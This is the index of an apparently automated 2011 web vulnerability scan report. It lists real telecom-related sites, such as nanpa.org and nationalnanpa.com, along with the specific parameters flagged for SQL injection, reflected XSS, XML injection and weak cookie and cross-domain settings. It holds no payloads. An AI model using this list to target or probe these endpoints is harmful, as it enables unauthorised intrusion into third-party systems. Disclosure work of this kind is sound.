XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 05122011-01

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Thu May 12 05:49:33 CDT 2011.



Loading

1. SQL injection

1.1. http://googleads.g.doubleclick.net/pagead/ads [frm parameter]

1.2. http://googleads.g.doubleclick.net/pagead/ads [ga_sid parameter]

1.3. http://metrics.sprint.com/b/ss/sprintuniversalsiteprod/1/H.22.1/s83234283372294 [REST URL parameter 1]

1.4. http://metrics.sprint.com/b/ss/sprintuniversalsiteprod/1/H.22.1/s83234283372294 [REST URL parameter 2]

1.5. http://www.nationalnanpa.com/nas/public/assigned_code_query_step1.do [codeQueryModel.stateAbbr parameter]

2. HTTP header injection

3. Cross-site scripting (reflected)

3.1. http://ds.addthis.com/red/psi/sites/nanpa.org/p.json [callback parameter]

3.2. http://img.mediaplex.com/content/0/12688/127209/SP_IPv6_640x480_timer.js [mpck parameter]

3.3. http://img.mediaplex.com/content/0/12688/127209/SP_IPv6_640x480_timer.js [mpck parameter]

3.4. http://img.mediaplex.com/content/0/12688/127209/SP_IPv6_640x480_timer.js [mpvc parameter]

3.5. http://img.mediaplex.com/content/0/12688/127209/SP_IPv6_640x480_timer.js [mpvc parameter]

3.6. http://nanpa.org/about_overview.php [REST URL parameter 1]

3.7. http://nanpa.org/awards_overview.php [REST URL parameter 1]

3.8. http://nanpa.org/education_overview.php [REST URL parameter 1]

3.9. http://nanpa.org/favicon.ico [REST URL parameter 1]

3.10. http://nanpa.org/history.php [REST URL parameter 1]

3.11. http://nanpa.org/recent_forum_posts.php [REST URL parameter 1]

3.12. http://syndicate.industryclick.com/feedmix/connected_planet_all_with_teaser/heds.js [count parameter]

3.13. http://syndicate.industryclick.com/feedmix/connected_planet_all_with_teaser/heds.js [pool parameter]

3.14. http://syndicate.industryclick.com/feedmix/connected_planet_bss_oss/heds.js [count parameter]

3.15. http://syndicate.industryclick.com/feedmix/connected_planet_bss_oss/heds.js [pool parameter]

3.16. http://www.911enable.com/business/contact_specialist.php [name of an arbitrarily supplied request parameter]

3.17. http://www.911enable.com/business/contact_specialist.php [provenance parameter]

3.18. http://www.commpartnersconnect.com/company [REST URL parameter 1]

3.19. http://www.commpartnersconnect.com/company [number parameter]

3.20. http://www.commpartnersconnect.com/favicon.ico [REST URL parameter 1]

3.21. http://www.etalkup.com/formjsforoneutf8.aspx [workgroup parameter]

3.22. http://www.etalkup.com/getpanelsdk.aspx [workgroup parameter]

3.23. http://www.nanpa.org/favicon.ico [REST URL parameter 1]

3.24. http://www.nanpa.org/forums/external.php [REST URL parameter 1]

3.25. http://www.nanpa.org/forums/external.php [REST URL parameter 2]

3.26. http://www.nanpa.org/viewers/scroller_x.swf [REST URL parameter 1]

3.27. http://www.nanpa.org/viewers/scroller_x.swf [REST URL parameter 2]

3.28. https://www.nationalnanpa.com/nas/security/user_reg_pre_mail.do [userStageModel.emailAddr parameter]

3.29. http://www.redskye911.com/e911_information_center/default.aspx [_TSM_HiddenField_ parameter]

3.30. http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/ [Referer HTTP header]

3.31. http://seg.sharethis.com/getSegment.php [__stid cookie]

4. Flash cross-domain policy

4.1. http://ad.doubleclick.net/crossdomain.xml

4.2. http://altfarm.mediaplex.com/crossdomain.xml

4.3. http://api.facebook.com/crossdomain.xml

4.4. http://b.scorecardresearch.com/crossdomain.xml

4.5. http://by.optimost.com/crossdomain.xml

4.6. http://fls.doubleclick.net/crossdomain.xml

4.7. http://img.mediaplex.com/crossdomain.xml

4.8. http://metrics.connectedplanetonline.com/crossdomain.xml

4.9. http://metrics.sprint.com/crossdomain.xml

4.10. http://metrics.vonage.com/crossdomain.xml

4.11. http://now.eloqua.com/crossdomain.xml

4.12. http://pixel.quantserve.com/crossdomain.xml

4.13. http://api.demandbase.com/crossdomain.xml

4.14. http://api.tweetmeme.com/crossdomain.xml

4.15. http://cdn.stumble-upon.com/crossdomain.xml

4.16. http://feeds.bbci.co.uk/crossdomain.xml

4.17. http://googleads.g.doubleclick.net/crossdomain.xml

4.18. http://nanpa.org/crossdomain.xml

4.19. http://newsrss.bbc.co.uk/crossdomain.xml

4.20. http://support.sprint.com/crossdomain.xml

4.21. http://w.sharethis.com/crossdomain.xml

4.22. http://www.awltovhc.com/crossdomain.xml

4.23. http://www.dslreports.com/crossdomain.xml

4.24. http://www.facebook.com/crossdomain.xml

4.25. http://www.nanpa.org/crossdomain.xml

4.26. http://www.stumbleupon.com/crossdomain.xml

4.27. http://anpisolutions.app4.hubspot.com/crossdomain.xml

4.28. http://i.dslr.net/crossdomain.xml

4.29. http://twitter.com/crossdomain.xml

4.30. http://www.vonage.com/crossdomain.xml

5. Silverlight cross-domain policy

5.1. http://ad.doubleclick.net/clientaccesspolicy.xml

5.2. http://b.scorecardresearch.com/clientaccesspolicy.xml

5.3. http://metrics.connectedplanetonline.com/clientaccesspolicy.xml

5.4. http://metrics.sprint.com/clientaccesspolicy.xml

5.5. http://metrics.vonage.com/clientaccesspolicy.xml

6. Cleartext submission of password

6.1. http://forum.link2voip.com/favicon.ico

6.2. http://www.secviz.org/node/89

7. XML injection

7.1. http://api.facebook.com/restserver.php [format parameter]

7.2. http://images.smartname.com/smartname/images/favicon.ico [REST URL parameter 1]

7.3. http://images.smartname.com/smartname/images/favicon.ico [REST URL parameter 2]

7.4. http://images.smartname.com/smartname/images/favicon.ico [REST URL parameter 3]

7.5. http://mobilitypoint.westcon.com/favicon.ico [REST URL parameter 1]

7.6. http://www.nanpa.org/forums/external.php [type parameter]

8. SSL cookie without secure flag set

8.1. https://catalyst.fastcatalog.net/

8.2. https://lnp.activationnow.com/lnp/

8.3. https://support.connexon.com/custom/customimages/911_logo_trc.jpg.gif

8.4. https://support.connexon.com/custom/customimages/Custom_HeadLogo.gif

8.5. https://support.connexon.com/custom/customimages/portal-browse-solutions.gif

8.6. https://support.connexon.com/custom/customimages/portal-browse-ticket.gif

8.7. https://support.connexon.com/images/favicon.ico

8.8. https://support.connexon.com/images/spacer.gif

8.9. https://support.connexon.com/sd/SolutionsHome.sd

8.10. https://support.connexon.com/style/demo.css

8.11. https://support.connexon.com/style/style.css

8.12. https://lnp.activationnow.com/favicon.ico

8.13. https://lnp.activationnow.com/lnp/jsp/logon/login.jsp

8.14. https://www.nationalnanpa.com/nas/security/user_reg_mail.do

8.15. https://www.nationalnanpa.com/nas/security/user_reg_pre_mail.do

9. Session token in URL

9.1. http://api.demandbase.com/api/v2/ip.json

9.2. http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/

9.3. http://images.smartname.com/scripts/google_afd_v2.js

9.4. http://l.sharethis.com/pview

9.5. https://lnp.activationnow.com/lnp/

9.6. https://lnp.activationnow.com/lnp/jsp/logon/login.jsp

9.7. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate

9.8. http://support.sprint.com/support/article/Bring_your_existing_number_to_Sprint/case-wh164052-20100420-140547

9.9. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html

9.10. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html

9.11. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html

9.12. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html

10. SSL certificate

10.1. https://extranet.connexon.com/

10.2. https://gvnwlnp.com/

10.3. https://lnp.activationnow.com/

10.4. https://catalyst.fastcatalog.net/

10.5. https://support.connexon.com/

10.6. https://www.nationalnanpa.com/

11. ASP.NET ViewState without MAC enabled

12. Cookie scoped to parent domain

12.1. http://www.secviz.org/node/89

12.2. http://ad.doubleclick.net/clk

12.3. http://b.scorecardresearch.com/b

12.4. http://id.google.com/verify/EAAAANsBmSEnaufGrFO2VVQlXFg.gif

12.5. http://metrics.connectedplanetonline.com/b/ss/primediateleph/1/H.22.1/s8270624386612

12.6. http://metrics.sprint.com/b/ss/sprintuniversalsiteprod/1/H.22.1/s83234283372294

12.7. http://metrics.vonage.com/b/ss/vonagevonagecomsubscribeprod/1/H.21/s84690568589139

12.8. http://nextelonline.nextel.com/tl/set_tl.html

12.9. http://pixel.quantserve.com/pixel

12.10. http://shop2.sprint.com/en/support/faq/wlnp.shtml

12.11. http://www.linkedin.com/companyInsider

12.12. http://www.vonage.com/lp/US/afflpdc/

12.13. http://www.vonage.com/lp/US/afflpdc/index.php

13. Cookie without HttpOnly flag set

13.1. https://catalyst.fastcatalog.net/

13.2. https://lnp.activationnow.com/lnp/

13.3. http://s.clickability.com/s

13.4. https://support.connexon.com/custom/customimages/911_logo_trc.jpg.gif

13.5. https://support.connexon.com/custom/customimages/Custom_HeadLogo.gif

13.6. https://support.connexon.com/custom/customimages/portal-browse-solutions.gif

13.7. https://support.connexon.com/custom/customimages/portal-browse-ticket.gif

13.8. https://support.connexon.com/images/favicon.ico

13.9. https://support.connexon.com/images/spacer.gif

13.10. https://support.connexon.com/sd/SolutionsHome.sd

13.11. https://support.connexon.com/style/demo.css

13.12. https://support.connexon.com/style/style.css

13.13. http://support.sprint.com/support/article/Bring_your_existing_number_to_Sprint/case-wh164052-20100420-140547

13.14. http://www.911enable.com/business/contact_specialist.php

13.15. http://www.atis.org/

13.16. http://www.commpartnersconnect.com/company

13.17. http://www.job-search-engine.com/keyword/number-portability/

13.18. http://www.linkedin.com/companyInsider

13.19. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html

13.20. http://www.secviz.org/node/89

13.21. http://www.westcongroup.com/

13.22. http://ad.doubleclick.net/clk

13.23. http://anpisolutions.app4.hubspot.com/salog.js.aspx

13.24. http://b.scorecardresearch.com/b

13.25. https://lnp.activationnow.com/favicon.ico

13.26. https://lnp.activationnow.com/lnp/jsp/logon/login.jsp

13.27. http://metrics.connectedplanetonline.com/b/ss/primediateleph/1/H.22.1/s8270624386612

13.28. http://metrics.sprint.com/b/ss/sprintuniversalsiteprod/1/H.22.1/s83234283372294

13.29. http://metrics.vonage.com/b/ss/vonagevonagecomsubscribeprod/1/H.21/s84690568589139

13.30. http://nanpa.com/

13.31. http://nextelonline.nextel.com/tl/set_tl.html

13.32. http://pixel.quantserve.com/pixel

13.33. http://shop2.sprint.com/en/support/faq/wlnp.shtml

13.34. http://tis.org/

13.35. http://twitter.com/javascripts/blogger.js

13.36. http://twitter.com/statuses/user_timeline/secviz.json

13.37. http://www.nanpa.org/forums/external.php

13.38. http://www.nationalnanpa.com/area_code_maps/usmaps/ak.gif

13.39. http://www.nationalnanpa.com/area_code_maps/usmaps/al.gif

13.40. http://www.nationalnanpa.com/area_code_maps/usmaps/ar.gif

13.41. http://www.nationalnanpa.com/area_code_maps/usmaps/az.gif

13.42. http://www.nationalnanpa.com/area_code_maps/usmaps/ca.gif

13.43. http://www.nationalnanpa.com/area_code_maps/usmaps/co.gif

13.44. http://www.nationalnanpa.com/area_code_maps/usmaps/ct.gif

13.45. http://www.nationalnanpa.com/area_code_maps/usmaps/dc.gif

13.46. http://www.nationalnanpa.com/area_code_maps/usmaps/de.gif

13.47. http://www.nationalnanpa.com/area_code_maps/usmaps/fl.gif

13.48. http://www.nationalnanpa.com/area_code_maps/usmaps/ga.gif

13.49. http://www.nationalnanpa.com/area_code_maps/usmaps/hi.gif

13.50. http://www.nationalnanpa.com/area_code_maps/usmaps/ia.gif

13.51. http://www.nationalnanpa.com/area_code_maps/usmaps/id.gif

13.52. http://www.nationalnanpa.com/area_code_maps/usmaps/il.gif

13.53. http://www.nationalnanpa.com/area_code_maps/usmaps/in.gif

13.54. http://www.nationalnanpa.com/area_code_maps/usmaps/ks.gif

13.55. http://www.nationalnanpa.com/area_code_maps/usmaps/ky.gif

13.56. http://www.nationalnanpa.com/area_code_maps/usmaps/la.gif

13.57. http://www.nationalnanpa.com/area_code_maps/usmaps/ma.gif

13.58. http://www.nationalnanpa.com/area_code_maps/usmaps/us.gif

13.59. http://www.nationalnanpa.com/contact_us/index.html

13.60. http://www.nationalnanpa.com/content/img/cm_areaMap.jpg

13.61. http://www.nationalnanpa.com/content/img/codeMap_bg.jpg

13.62. http://www.nationalnanpa.com/content/img/fastTrack_bg.jpg

13.63. http://www.nationalnanpa.com/content/img/feedBack_bg.gif

13.64. http://www.nationalnanpa.com/content/img/hp_img_a.jpg

13.65. http://www.nationalnanpa.com/content/img/hp_img_b.jpg

13.66. http://www.nationalnanpa.com/content/img/leftNav_bg.gif

13.67. http://www.nationalnanpa.com/content/img/legal_bg.gif

13.68. http://www.nationalnanpa.com/content/img/mainbg.gif

13.69. http://www.nationalnanpa.com/content/img/nanpa_hp_logo.gif

13.70. http://www.nationalnanpa.com/content/img/nav_acMap_off.gif

13.71. http://www.nationalnanpa.com/content/img/nav_acMap_on.gif

13.72. http://www.nationalnanpa.com/content/img/nav_act_off.gif

13.73. http://www.nationalnanpa.com/content/img/nav_act_on.gif

13.74. http://www.nationalnanpa.com/content/img/nav_login_off.gif

13.75. http://www.nationalnanpa.com/content/img/nav_login_on.gif

13.76. http://www.nationalnanpa.com/content/img/nav_numRes_off.gif

13.77. http://www.nationalnanpa.com/content/img/nav_numRes_on.gif

13.78. http://www.nationalnanpa.com/content/img/nav_pub_off.gif

13.79. http://www.nationalnanpa.com/content/img/nav_pub_on.gif

13.80. http://www.nationalnanpa.com/content/img/nav_rep_off.gif

13.81. http://www.nationalnanpa.com/content/img/nav_rep_on.gif

13.82. http://www.nationalnanpa.com/content/img/nav_tools_off.gif

13.83. http://www.nationalnanpa.com/content/img/nav_tools_on.gif

13.84. http://www.nationalnanpa.com/content/img/subContent_bg.gif

13.85. http://www.nationalnanpa.com/content/js/browser_ie.js

13.86. http://www.nationalnanpa.com/content/js/dqm_loader.js

13.87. http://www.nationalnanpa.com/content/js/nanpa_nav.js

13.88. http://www.nationalnanpa.com/content/styles/nanpa_css_b.css

13.89. http://www.nationalnanpa.com/content/styles/nanpa_css_nav.css

13.90. http://www.nationalnanpa.com/content/styles/nanpa_css_p.css

13.91. http://www.nationalnanpa.com/nas/public/assigned_code_query_step1.do

13.92. http://www.nationalnanpa.com/nas/public/css/images/layout/list.gif

13.93. http://www.nationalnanpa.com/nas/public/css/neustar.css

13.94. http://www.nationalnanpa.com/nas/public/images/nanpa_hp_logo.gif

13.95. http://www.nationalnanpa.com/nas/public/images/neustar_logo.gif

13.96. http://www.nationalnanpa.com/nas/public/images/px_CCCCCC.gif

13.97. http://www.nationalnanpa.com/nas/public/js/utilities.js

13.98. http://www.vonage-forum.com/forum8.html

13.99. http://www.vonage.com/lp/US/afflpdc/

13.100. http://www.vonage.com/lp/US/afflpdc/index.php

14. Password field with autocomplete enabled

14.1. http://forum.link2voip.com/favicon.ico

14.2. https://gvnwlnp.com/login.aspx

14.3. https://lnp.activationnow.com/lnp/jsp/logon/login.jsp

14.4. http://nanpa.org/

14.5. http://nanpa.org/

14.6. http://nanpa.org/about_overview.php

14.7. http://nanpa.org/about_overview.php

14.8. http://nanpa.org/awards_overview.php

14.9. http://nanpa.org/awards_overview.php

14.10. http://nanpa.org/education_overview.php

14.11. http://nanpa.org/education_overview.php

14.12. http://nanpa.org/history.php

14.13. http://nanpa.org/history.php

14.14. https://support.connexon.com/sd/AddSolution.sd

14.15. https://support.connexon.com/sd/Request.sd

14.16. https://support.connexon.com/sd/SolutionsHome.sd

14.17. http://support.sprint.com/support/article/Bring_your_existing_number_to_Sprint/case-wh164052-20100420-140547

14.18. http://www.911enable.com/login/index.php

14.19. https://www.nationalnanpa.com/nas/security/authUser.do

14.20. https://www.nationalnanpa.com/nas/security/logon.do

14.21. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html

14.22. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html

14.23. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html

14.24. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html

14.25. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html

14.26. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html

14.27. http://www.secviz.org/node/89

15. ASP.NET debugging enabled

15.1. http://gvnwlnp.com/Default.aspx

15.2. https://gvnwlnp.com/Default.aspx

15.3. http://www.etalkup.com/Default.aspx

15.4. http://www.redskye911.com/Default.aspx

16. Referer-dependent response

16.1. http://twitter.com/statuses/user_timeline/secviz.json

16.2. http://www.facebook.com/plugins/like.php

16.3. http://www.stumbleupon.com/hostedbadge.php

17. Cross-domain POST

17.1. http://www.anpisolutions.com/wholesale-voice-and-data-services/signaling-network-and-database-services/gateway-services/

17.2. http://www.onwav.com/lnp

17.3. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html

17.4. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html

17.5. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html

17.6. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html

17.7. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html

17.8. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html

18. Cross-domain Referer leakage

18.1. http://ad.doubleclick.net/adj/connectedplanet.iclick.com/adtarget

18.2. http://ad.doubleclick.net/adj/connectedplanet.iclick.com/adtarget

18.3. http://ad.doubleclick.net/adj/connectedplanet.iclick.com/adtarget

18.4. http://ad.doubleclick.net/adj/connectedplanet.iclick.com/adtarget

18.5. http://ad.doubleclick.net/adj/connectedplanet.iclick.com/adtarget

18.6. http://fls.doubleclick.net/activityi

18.7. http://forum.link2voip.com/viewtopic.php

18.8. http://googleads.g.doubleclick.net/pagead/ads

18.9. http://googleads.g.doubleclick.net/pagead/ads

18.10. http://googleads.g.doubleclick.net/pagead/ads

18.11. http://img.mediaplex.com/content/0/12688/127209/SP_IPv6_640x480_timer.js

18.12. http://investor.hickorytech.com/phoenix.zhtml

18.13. http://news.google.com/news/search

18.14. http://www.911enable.com/business/contact_specialist.php

18.15. http://www.facebook.com/plugins/like.php

18.16. http://www.google.com/search

18.17. http://www.google.com/search

18.18. http://www.google.com/url

18.19. http://www.google.com/url

18.20. http://www.google.com/url

18.21. http://www.google.com/url

18.22. http://www.google.com/url

18.23. http://www.google.com/url

18.24. http://www.google.com/url

18.25. http://www.google.com/url

18.26. http://www.google.com/url

18.27. http://www.google.com/url

18.28. http://www.google.com/url

18.29. http://www.google.com/url

18.30. http://www.nationalnanpa.com/nas/public/assigned_code_query_display.do

18.31. http://www.nationalnanpa.com/nas/public/assigned_code_query_step1.do

18.32. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html

18.33. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html

18.34. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html

18.35. http://www.stumbleupon.com/badge/embed/1/

18.36. http://www.virtual-phone-number.org/index.php

18.37. http://www.vonage.com/lp/US/afflpdc/

19. Cross-domain script include

19.1. http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/

19.2. http://fls.doubleclick.net/activityi

19.3. http://googleads.g.doubleclick.net/pagead/ads

19.4. http://investor.hickorytech.com/phoenix.zhtml

19.5. http://nanpa.org/

19.6. http://nanpa.org/about_overview.php

19.7. http://nanpa.org/awards_overview.php

19.8. http://nanpa.org/education_overview.php

19.9. http://nanpa.org/history.php

19.10. http://tis.org/

19.11. http://www.911enable.com/

19.12. http://www.anpisolutions.com/wholesale-voice-and-data-services/signaling-network-and-database-services/gateway-services/

19.13. http://www.catalysttelecom.com/

19.14. http://www.catalysttelecom.com/error.aspx

19.15. http://www.dslreports.com/forum/r25728643-Nettalk-number-portability-

19.16. http://www.facebook.com/plugins/like.php

19.17. http://www.hickorytech-is.com/products/cabs.aspx

19.18. http://www.hickorytech-is.com/products/suitesolution-.aspx

19.19. http://www.hickorytech-is.com/products/suitesolution-/usage-pricing-manager.aspx

19.20. http://www.hickorytech.com/

19.21. http://www.hickorytech.com/business-services/data.aspx

19.22. http://www.hickorytech.com/site-map.aspx

19.23. http://www.hickorytech.com/wholesale-services/access-services.aspx

19.24. http://www.hickorytech.com/wholesale-services/fiber-based-transport.aspx

19.25. http://www.hickorytech.com/wholesale-services/network-operations-center.aspx

19.26. http://www.job-search-engine.com/keyword/number-portability/

19.27. http://www.onwav.com/lnp

19.28. http://www.redskye911.com/

19.29. http://www.redskye911.com/e911_information_center/

19.30. http://www.redskye911.com/e911_information_center/e911_hosted_solutions/

19.31. http://www.redskye911.com/e911_information_center/e911_hosted_solutions/loadingAnimation.gif

19.32. http://www.redskye911.com/e911_information_center/loadingAnimation.gif

19.33. http://www.redskye911.com/e911_products/

19.34. http://www.redskye911.com/e911_products/e911_anywhere/hosted/

19.35. http://www.redskye911.com/e911_products/e911_anywhere/hosted/loadingAnimation.gif

19.36. http://www.redskye911.com/e911_products/e911_anywhere/hosted/purchasing/

19.37. http://www.redskye911.com/e911_products/e911_anywhere/hosted/purchasing/loadingAnimation.gif

19.38. http://www.redskye911.com/e911_products/e911_anywhere/network_services/

19.39. http://www.redskye911.com/e911_products/loadingAnimation.gif

19.40. http://www.redskye911.com/favicon.ico

19.41. http://www.redskye911.com/knowledge_base/

19.42. http://www.redskye911.com/knowledge_base/loadingAnimation.gif

19.43. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html

19.44. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html

19.45. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html

19.46. http://www.secviz.org/node/89

19.47. http://www.stumbleupon.com/badge/embed/1/

19.48. http://www.vonage-forum.com/forum8.html

19.49. http://www.vonage.com/lp/US/afflpdc/

19.50. http://www.vonage.com/lp/US/afflpdc/index.php

19.51. http://www.westcongroup.com/

19.52. http://www.westcongroup.com/sites/westcon-group-global/global/compass-e-commerce

20. TRACE method is enabled

20.1. http://api.demandbase.com/

20.2. http://connectedplanetonline.com/

20.3. http://metrics.connectedplanetonline.com/

20.4. http://metrics.vonage.com/

20.5. http://mobilitypoint.westcon.com/

20.6. http://netvoipcommunications.com/

20.7. http://support.sprint.com/

20.8. http://tis.org/

20.9. http://tracking.hubspot.com/

20.10. http://www.commpartnersconnect.com/

20.11. http://www.resourcenter.net/

20.12. http://www.stumbleupon.com/

20.13. http://www.virtual-phone-number.org/

20.14. http://www.vonage-forum.com/

20.15. http://www.vonage.com/

20.16. http://www.westcongroup.com/

21. Email addresses disclosed

21.1. http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/

21.2. http://connectedplanetonline.com/js/jquery-cookie.js

21.3. http://forum.link2voip.com/viewtopic.php

21.4. https://lnp.activationnow.com/lnp/jsp/logon/login.jsp

21.5. http://nanpa.com/

21.6. http://nanpa.org/

21.7. http://nanpa.org/about_overview.php

21.8. http://nanpa.org/awards_overview.php

21.9. http://nanpa.org/education_overview.php

21.10. http://nanpa.org/history.php

21.11. http://nanpa.org/javascript/cookieman.js

21.12. http://nanpa.org/javascript/curr_year.js

21.13. http://nanpa.org/javascript/external.js

21.14. http://nanpa.org/javascript/fontsizer.js

21.15. http://nanpa.org/javascript/gen_mm_object.js

21.16. http://nanpa.org/pullout_menus.js

21.17. http://nanpa.org/startup.js

21.18. http://netvoipcommunications.com/additional-services.html

21.19. http://netvoipcommunications.com/js/hoverintent.js

21.20. http://netvoipcommunications.com/pricing.html

21.21. http://www.911enable.com/

21.22. http://www.911enable.com/business.php

21.23. http://www.911enable.com/business/contact_specialist.php

21.24. http://www.911enable.com/business/resource_center/knowledge_base.php

21.25. http://www.911enable.com/login/index.php

21.26. http://www.atis.org/

21.27. http://www.atis.org/cioc_foss.asp

21.28. http://www.google.com/search

21.29. http://www.job-search-engine.com/assets/js/niftycube.js

21.30. http://www.job-search-engine.com/keyword/number-portability/

21.31. http://www.nanpa.org/javascript/cookieman.js

21.32. http://www.nanpa.org/javascript/curr_year.js

21.33. http://www.nanpa.org/javascript/external.js

21.34. http://www.nanpa.org/javascript/fontsizer.js

21.35. http://www.nanpa.org/javascript/gen_mm_object.js

21.36. http://www.nanpa.org/pullout_menus.js

21.37. http://www.nanpa.org/startup.js

21.38. http://www.nationalnanpa.com/contact_us/index.cgi

21.39. http://www.nationalnanpa.com/nas/public/assigned_code_query_display.do

21.40. http://www.nationalnanpa.com/nas/public/assigned_code_query_step1.do

21.41. https://www.nationalnanpa.com/nas/security/authUser.do

21.42. https://www.nationalnanpa.com/nas/security/logon.do

21.43. https://www.nationalnanpa.com/nas/security/user_reg_mail.do

21.44. https://www.nationalnanpa.com/nas/security/user_reg_pre_mail.do

21.45. https://www.nationalnanpa.com/nas/security/user_reg_pre_step1.do

21.46. https://www.nationalnanpa.com/nas/security/user_reg_pre_step2.do

21.47. https://www.nationalnanpa.com/nas/security/user_reg_step1.do

21.48. http://www.onwav.com/css/style.css

21.49. http://www.redskye911.com/

21.50. http://www.redskye911.com/e911_information_center/

21.51. http://www.redskye911.com/e911_information_center/e911_hosted_solutions/

21.52. http://www.redskye911.com/e911_information_center/e911_hosted_solutions/loadingAnimation.gif

21.53. http://www.redskye911.com/e911_information_center/loadingAnimation.gif

21.54. http://www.redskye911.com/e911_products/

21.55. http://www.redskye911.com/e911_products/e911_anywhere/hosted/

21.56. http://www.redskye911.com/e911_products/e911_anywhere/hosted/loadingAnimation.gif

21.57. http://www.redskye911.com/e911_products/e911_anywhere/hosted/purchasing/

21.58. http://www.redskye911.com/e911_products/e911_anywhere/hosted/purchasing/loadingAnimation.gif

21.59. http://www.redskye911.com/e911_products/e911_anywhere/network_services/

21.60. http://www.redskye911.com/e911_products/loadingAnimation.gif

21.61. http://www.redskye911.com/favicon.ico

21.62. http://www.redskye911.com/knowledge_base/

21.63. http://www.redskye911.com/knowledge_base/loadingAnimation.gif

21.64. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html

21.65. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html

21.66. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html

21.67. http://www.secviz.org/node/89

21.68. http://www.sprint.com/assets/scripts/analytics/analyticsFramework.js

21.69. http://www.sprint.com/assets/scripts/analytics/voc/surveyLogic.js

21.70. http://www.westcongroup.com/

21.71. http://www.westcongroup.com/sites/westcon-group-global/global/compass-e-commerce

22. Private IP addresses disclosed

22.1. http://api.facebook.com/restserver.php

22.2. http://static.ak.facebook.com/connect.php/en_US/css/bookmark-button-css/connect-button-css/share-button-css/FB.Connect-css/connect-css

22.3. http://static.ak.facebook.com/connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML

22.4. http://static.ak.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US

22.5. http://static.ak.fbcdn.net/connect.php/js/FB.Share

22.6. http://static.ak.fbcdn.net/rsrc.php/v1/yS/r/vnjkQm4QANt.js

22.7. http://static.ak.fbcdn.net/rsrc.php/v1/yh/r/HD3OAbjOVTn.css

22.8. http://www.facebook.com/extern/login_status.php

22.9. http://www.facebook.com/extern/login_status.php

22.10. http://www.facebook.com/plugins/like.php

22.11. http://www.google.com/sdch/vD843DpA.dct

23. Credit card numbers disclosed

24. Robots.txt file

24.1. http://ad.doubleclick.net/adj/connectedplanet.iclick.com/adtarget

24.2. http://altfarm.mediaplex.com/ad/js/12688-127209-4062-0

24.3. http://api.facebook.com/restserver.php

24.4. http://b.scorecardresearch.com/b

24.5. http://by.optimost.com/trial/471/p/landingpage.6cf/40/content.js

24.6. http://cdn.stumble-upon.com/css/badges_su.css

24.7. http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/

24.8. http://feeds.bbci.co.uk/news/rss.xml

24.9. http://fls.doubleclick.net/activityi

24.10. http://googleads.g.doubleclick.net/pagead/ads

24.11. http://i.dslr.net/css/aj6m.js

24.12. http://img.mediaplex.com/content/0/12688/127209/SP_IPv6_640x480_timer.js

24.13. http://investor.hickorytech.com/phoenix.zhtml

24.14. http://l.addthiscdn.com/live/t00/250lo.gif

24.15. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate

24.16. http://metrics.connectedplanetonline.com/b/ss/primediateleph/1/H.22.1/s8270624386612

24.17. http://metrics.sprint.com/b/ss/sprintuniversalsiteprod/1/H.22.1/s83234283372294

24.18. http://metrics.vonage.com/b/ss/vonagevonagecomsubscribeprod/1/H.21/s84690568589139

24.19. http://nanpa.org/

24.20. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml

24.21. http://nextelonline.nextel.com/tl/set_tl.html

24.22. http://now.eloqua.com/visitor/v200/svrGP.aspx

24.23. http://pixel.quantserve.com/pixel

24.24. http://s.clickability.com/s

24.25. http://shop2.sprint.com/en/support/faq/wlnp.shtml

24.26. http://tis.org/

24.27. http://twitter.com/statuses/user_timeline/secviz.json

24.28. http://www.911enable.com/

24.29. http://www.atis.org/

24.30. http://www.awltovhc.com/image-1791927-2832191

24.31. http://www.catalysttelecom.com/

